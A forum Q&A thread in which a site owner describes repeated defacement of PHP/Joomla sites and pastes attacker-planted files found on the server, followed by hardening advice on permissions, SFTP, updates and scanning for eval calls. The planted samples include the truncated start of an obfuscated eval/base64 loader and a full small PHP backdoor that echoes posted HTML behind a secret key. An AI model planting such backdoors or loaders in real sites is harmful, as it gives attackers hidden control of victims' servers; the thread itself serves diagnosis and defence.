Php – front page keeps getting hacked

hackingPHPwebsite

A similar attack keeps happenning on two of my sites (one is running latest Joomla, one is not).

It usually says "hacked by general" or something similar. When I check the files on one of them, there's a php file with similar code:

eval("?>".gzuncompress(base64_decode("eJzUvWmT4kiyKPp9... etc.

I also found a weird htm file that has a lot of messy code. If you need I can post these files zipped somewhere.

The attacks are always just an altered index page and this weird php file (but this time there was also another php page with this code:

<?php
if ($_GET['randomId'] != "Wo9QPY5euhw0bEKfNve82PW926VyluUh2HA3FGAidHDwA7h3wwZCOA2F2kva028q") {
    echo "Access Denied";
    exit();
}

// display the HTML code:
echo stripslashes($_POST['wproPreviewHTML']);

?>

I have restored the original index page but this is getting really annoying. I am also checking my pc for trojans as I've read that someone might have stolen my ftp credentials with a trojan (but for this one site I didn't even use ftp).

Help!

Best Answer

Have you changed your password to something more secure?

Related Solutions

Php – Got Hacked. Want to understand how

First of all chmod 744 its NOT what you want. The point of chmod is to revoke access to other accounts on the system. Chmod 700 is far more secure than chmod 744. However Apache only needs the execute bit to run your php application.

chmod 500 -R /your/webroot/

chown www-data:www-data -R /your/webroot/

www-data is commonly used as Apache's account which is used to execute the php. You could also run this command to see the user account:

`<?php
print system("whoami");
?>`

FTP is horribly insecure and it's very likely that you were hacked from this method. Using FTP you can make files writable, and then infect them again. Make sure you run an anti-virus on all machines with FTP access. There are viruses that sniff the local traffic for FTP user-names and passwords and then login and infect the files. If you care about security you'll use SFTP, which encrypts everything. Sending source code and passwords over the wire in clear text is total madness.

Another possibility is that you are using an old library or application. Visit the software vendor's site and make sure you are running the latest version.

WordPress – How did they hack the WordPress sites

That's your problem right there. Most of these attacks are carried out by automated scripts that look for known vulnerabilities in older wordpress systems. Since anyone can look at bug reports and changelogs, it's not too difficult to engineer a script to exploit a weakness.

Your best defense is to always have your wordpress version AND your themes/plugins up to date.

I used to have this problem with a few of my defunct blogs, but keeping them constantly updated fixed it.

Do a grep on your existing blogs and look for any iframes or eval method calls in your WP directory. Also check the DB. Once it's all clean, update your WP version and themes/plugins and keep it updated.

Next login to Google webmaster and, if you haven't already, prove ownership and ask for a review of your site. The warning should go away after awhile.

Related Topic